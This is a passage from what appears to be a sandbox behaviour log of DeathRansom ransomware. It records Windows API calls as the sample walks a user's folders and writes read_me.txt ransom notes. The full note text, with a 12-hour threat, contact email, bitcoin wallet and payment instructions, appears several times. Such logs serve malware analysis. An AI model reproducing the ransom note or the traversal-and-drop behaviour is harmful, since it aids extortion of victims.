FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.035] WriteFile (in: hFile=0x774, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17de6c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17de6c*=0x6b3, lpOverlapped=0x0) returned 1 [0074.036] CloseHandle (hObject=0x774) returned 1 [0074.036] GetProcessHeap () returned 0x280000 [0074.036] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a30078 | out: hHeap=0x280000) returned 1 [0074.036] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34e7a690, ftCreationTime.dwHighDateTime=0x1d58cdf, ftLastAccessTime.dwLowDateTime=0x6bd84c0, ftLastAccessTime.dwHighDateTime=0x1d53be9, ftLastWriteTime.dwLowDateTime=0x6bd84c0, ftLastWriteTime.dwHighDateTime=0x1d53be9, nFileSizeHigh=0x0, nFileSizeLow=0x10b4d, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="O211aycB4UPXuVl.pptx", cAlternateFileName="O211AY~1.PPT")) returned 1 [0074.037] lstrcpyW (in: lpString1=0x8a30078, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0074.037] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 58 [0074.037] QueueUserWorkItem (Function=0x40a710, Context=0x8a30078, Flags=0x0) returned 1 [0074.037] GetProcessHeap () returned 0x280000 [0074.037] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a40080 [0074.037] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*") returned 59 [0074.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.040] lstrcpyW (in: lpString1=0x8ad00c8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0074.040] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 59 [0074.040] QueueUserWorkItem (Function=0x40a710, Context=0x8ad00c8, Flags=0x0) returned 1 [0074.040] GetProcessHeap () returned 0x280000 [0074.040] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a40080 [0074.040] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*") returned 45 [0074.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0074.041] lstrcpyW (in: lpString1=0x8a40080, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0074.041] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 60 [0074.041] QueueUserWorkItem (Function=0x40a710, Context=0x8a40080, Flags=0x0) returned 1 [0074.041] GetProcessHeap () returned 0x280000 [0074.041] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a50088 [0074.042] wnsprintfW (in: pszDest=0x8a50088, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 45 [0074.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0074.042] lstrcpyW (in: lpString1=0x8a60090, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0074.042] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 61 [0074.043] QueueUserWorkItem (Function=0x40a710, Context=0x8a60090, Flags=0x0) returned 1 [0074.043] GetProcessHeap () returned 0x280000 [0074.043] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b010e8 [0074.044] wnsprintfW (in: pszDest=0x8b010e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*") returned 51 [0074.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.045] lstrcpyW (in: lpString1=0x8b010e8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0074.045] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 62 [0074.045] QueueUserWorkItem (Function=0x40a710, Context=0x8b010e8, Flags=0x0) returned 1 [0074.045] GetProcessHeap () returned 0x280000 [0074.045] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8bd0048 [0074.046] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*") returned 64 [0074.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.058] lstrcpyW (in: lpString1=0x8b40018, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0074.058] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 63 [0074.058] QueueUserWorkItem (Function=0x40a710, Context=0x8b40018, Flags=0x0) returned 1 [0074.058] GetProcessHeap () returned 0x280000 [0074.058] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8bd0048 [0074.058] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*") returned 58 [0074.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0074.106] lstrcpyW (in: lpString1=0x8a50088, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0074.106] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 64 [0074.106] QueueUserWorkItem (Function=0x40a710, Context=0x8a50088, Flags=0x0) returned 1 [0074.106] GetProcessHeap () returned 0x280000 [0074.106] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ac00c0 [0074.107] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*") returned 41 [0074.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0074.109] lstrcpyW (in: lpString1=0x8ac00c0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0074.109] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 65 [0074.109] QueueUserWorkItem (Function=0x40a710, Context=0x8ac00c0, Flags=0x0) returned 1 [0074.109] GetProcessHeap () returned 0x280000 [0074.109] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8aa00b0 [0074.110] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*") returned 50 [0074.110] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="RecentPlaces.lnk", cAlternateFileName="\x07")) returned 0xffffffff [0074.110] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\read_me.txt") returned 60 [0074.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0074.120] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.120] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0074.121] CloseHandle (hObject=0x780) returned 1 [0074.121] GetProcessHeap () returned 0x280000 [0074.121] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8aa00b0 | out: hHeap=0x280000) returned 1 [0074.121] lstrcpyW (in: lpString1=0x8aa00b0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0074.121] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 66 [0074.121] QueueUserWorkItem (Function=0x40a710, Context=0x8aa00b0, Flags=0x0) returned 1 [0074.121] GetProcessHeap () returned 0x280000 [0074.121] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0074.122] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned 41 [0074.122] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0074.122] lstrcpyW (in: lpString1=0x8a70098, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0074.122] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 67 [0074.122] QueueUserWorkItem (Function=0x40a710, Context=0x8a70098, Flags=0x0) returned 1 [0074.122] GetProcessHeap () returned 0x280000 [0074.122] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x89e0050 [0074.123] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*") returned 48 [0074.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa4c88b0, ftCreationTime.dwHighDateTime=0x1d4cd04, ftLastAccessTime.dwLowDateTime=0x758b0d60, ftLastAccessTime.dwHighDateTime=0x1d4d33d, ftLastWriteTime.dwLowDateTime=0x758b0d60, ftLastWriteTime.dwHighDateTime=0x1d4d33d, nFileSizeHigh=0x0, nFileSizeLow=0xce30, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="_TCIZKG m85i6ha7hPsV.wav", cAlternateFileName="廠疙ᣜ?\x17甴\x17a")) returned 0xffffffff [0074.123] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\read_me.txt") returned 58 [0074.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.124] GetProcessHeap () returned 0x280000 [0074.124] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x89e0050 | out: hHeap=0x280000) returned 1 [0074.124] lstrcpyW (in: lpString1=0x89e0050, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0074.124] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 68 [0074.124] QueueUserWorkItem (Function=0x40a710, Context=0x89e0050, Flags=0x0) returned 1 [0074.124] GetProcessHeap () returned 0x280000 [0074.124] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b50020 [0074.125] wnsprintfW (in: pszDest=0x8b50020, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*") returned 43 [0074.125] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa4c88b0, ftCreationTime.dwHighDateTime=0x1d4cd04, ftLastAccessTime.dwLowDateTime=0x758b0d60, ftLastAccessTime.dwHighDateTime=0x1d4d33d, ftLastWriteTime.dwLowDateTime=0x758b0d60, ftLastWriteTime.dwHighDateTime=0x1d4d33d, nFileSizeHigh=0x0, nFileSizeLow=0xce30, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="_TCIZKG m85i6ha7hPsV.wav", cAlternateFileName="廠疙ᣜ?\x17甴\x17a")) returned 0xffffffff [0074.125] wnsprintfW (in: pszDest=0x8b50020, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\read_me.txt") returned 53 [0074.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0074.125] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.125] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0074.126] CloseHandle (hObject=0x780) returned 1 [0074.126] GetProcessHeap () returned 0x280000 [0074.126] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b50020 | out: hHeap=0x280000) returned 1 [0074.127] lstrcpyW (in: lpString1=0x8b50020, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0074.127] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: 